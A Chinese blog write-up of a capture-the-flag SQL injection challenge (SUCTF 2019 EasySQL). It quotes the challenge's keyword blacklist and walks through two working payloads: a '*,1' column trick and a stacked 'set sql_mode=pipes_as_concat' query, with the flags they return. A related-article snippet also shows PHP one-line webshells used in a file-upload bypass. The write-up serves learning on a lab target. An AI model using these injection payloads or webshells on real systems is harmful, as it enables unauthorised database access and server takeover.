[SUCTF 2019]EasySQL(set sql_mode=pipes_as_concat修改||)

最新推荐文章于 2023-11-28 09:37:00 发布
最新推荐文章于 2023-11-28 09:37:00 发布
阅读量501 收藏
点赞数 1
分类专栏: BUUCTF-WEB 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253573/article/details/109572159
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
都被过滤,查看公开的源码
黑名单 :
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
查询语句:
select $_GET['query'] || flag from flag
两种方法
都是神乎其神的网友大佬想到的
1、由于没有过滤*所以可以直接构造payload
payload: *,1
查询flag
拼接之后的语句为
select *,1 || flag from flag
先查找全部 [0] => flag{fd583590-4eef-4964-8fe5-ecd4ad6411e5},然后在查找1 [1] => 1
得到结果
Array ( [0] => flag{fd583590-4eef-4964-8fe5-ecd4ad6411e5} [1] => 1 )

2、查询语句select $_GET['query'] || flag from flag中的|作用为‘或’,所以可以使用set sql_mode=pipes_as_concat 将|设置为‘和’。

pipes_as_concat:将导致 “||” 字符串被视为一个标准的 SQL 字符串合并操作符,而不是 “OR” 操作符的一个同义词。

payload: 1;set sql_mode=pipes_as_concat;select 1
拼接后的语句为:1;set sql_mode=pipes_as_concat;select 1||flag from Flag
先查找1:Array ( [0] => 1 );设置|的作用,由‘或’设置为‘和’;
再查询1,此时由于|为和查询,所以select 1 || flag from flag,1和flag都会被查询:Array ( [0] => 1flag{720b70f2-99eb-4bc1-a565-c8509799edee} )
得到结果
Array ( [0] => 1 ) Array ( [0] => 1flag{720b70f2-99eb-4bc1-a565-c8509799edee} )

哇gg
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql sql_mode= 的作用说明
12-15
sql_mode=””,即强制不设定MySql模式(如不作输入检测、错误提示、语法模式检查等)应该能提高性能,... mysql_mode的详细描述: 在mysql 5中,默认的是REAL_AS_FLOAT,PIPES_AS_CONTACT,ANSI_QUOTES,GNORE_SPACE和ANSI
buuctf easysql
hintll的博客
05-31 1596
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
MySQL读书笔记
博客
01-05 539
2019/11/26 19:08:52 第一章 E-R图设计 实体之间的联系: 1:1 1:n m:n sql标准:SQL-92 数据定义语言:创建各种数据库对象 数据查询语言:查询sql 数据操纵语言:增删改 数据控制语言:权限控制 配置服务器MySQL server instance config wizard 选项文件my.ini,用于修改MySQL的默认设置 数据目录,用...
MySQL(一):Linux下的RPM方式安装
G0_hw
09-21 195
一. 准备工作 官网下载地址:https://dev.mysql.com/downloads/mysql/ 下载server包和client包,我这边是通过ftp上传到Linux服务器的/opt目录下。 检查工作 检查当前系统是否安装过mysql -- 执行安装命令前,先执行查询命令 rpm -qa|grep mysql -- 如果存在mysql-libs的旧版本包如下: -- ...
buuctf之EasySQL
qq_38634097的博客
04-18 801
pyload:1’ or1=1 # (#的意思是把后面的注释掉,在这里是注释到闭合的‘,保证语句正常执行)页面报错,说明为字符型,在构造pyload时候,需要主要闭合‘。用or是因为1=1为真,则该语句执行结果为真。1、手工判断注入类型。输入1’判断注入类型,2、构造pyload。
BUUCTF之EasySQL [SUCTF 2019]
金 帛的博客
04-18 2802
BUUCTF的WP
BUUCTF【Web】EasySQL
qq_70434663的博客
02-28 1023
如果我们传入的username为1' or 1=1 #,随便输入password。既然知道了是单引号闭合,现在就尝试注入,首先了解一下万能用户名和密码。会用到以下的句型,如果用户与密码匹配正确则返回真值通过验证成功登录。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。所以尝试闭合方法,随便输入1、1'、1''密码随便输入即可。但输入1'时会报错,所以语句为单引号闭合。当输入1和1''时会出现以下的提示,××,××,××为两张表查询字段的数量。一般的,库验证登录注册。
buuctf(EasySQL)
qq_75005708的博客
04-12 218
发现过滤了flag,看了其它的wp,这道题是内部查询语句,想让||不是逻辑或,用sql_mode去转换它,设置。sql_mode它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查。还有就是这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个。然后我们接着查 1;回显为1,我们接着查看表 1;2.我们查看数据库 1;0就没有什么回显,然后我们去看看源代码。也只有看出post,其它也没有什么。回显是1,我们再看看0。然后我们先输入1看看。
sql_mode详解(超详细,亲测有效)
热门推荐
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
threecodes.rar_C语言_pipes_threecodes_父进程 创建 子进程_生产者消费者
07-14
1、 用C语言写一个程序名字为procs4,该程序运行过程中共有4个进程,procs4程序(父进程)创建2个子进程p1和p2,p1子进程再创建一个子进程p3。4个进程完成如下工作: 父进程并打印字符串“I am main process”;...
ipc.rar_ ipc_IPC_linux ipc_pipes_进程间通信ipc
09-23
Linux进程间通信小例子,包括管道,命名管道,信号,共享内存,消息队列等
industry_old_pipes
09-02
industry_old_pipes
maua_20211_ecm252_angular_diretivas_pipes
04-11
如果您更改任何源文件,该应用程序将自动重新加载。 代码脚手架 运行ng generate component component-name生成一个新的组件。 您还可以使用ng generate directive|pipe|service|class|guard|interface|enum|module...
BUUCTF——[SUCTF2019]EasySQL
最新发布
weixin_62248541的博客
11-28 312
BUUCTF——[SUCTF2019]EasySQL
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1037
又是一道考察sql注入的题。
BUUCTF[极客大挑战 2019] EasySQL 1
m0_75178803的博客
06-12 3656
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客大挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
[极客大挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
set sql_mode=PIPES_AS_CONCAT
07-16
`SET sql_mode=PIPES_AS_CONCAT` 是一条 MySQL 查询语句,用于设置 SQL 模式为 PIPES_AS_CONCATSQL 模式是 MySQL 中的一个配置选项,它决定了在执行 SQL 语句时的行为方式。PIPES_AS_CONCAT 是一种 SQL 模式,它改变了管道符号(||)的含义。在默认的 SQL 模式下,管道符号用于按位或运算符,而在 PIPES_AS_CONCAT 模式下,管道符号被解释为字符串的连接运算符。 通过执行 `SET sql_mode=PIPES_AS_CONCAT` 这条语句,你将把 SQL 模式设置为 PIPES_AS_CONCAT。这意味着在接下来的查询中,管道符号将被解释为字符串的连接运算符,而不是按位或运算符。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值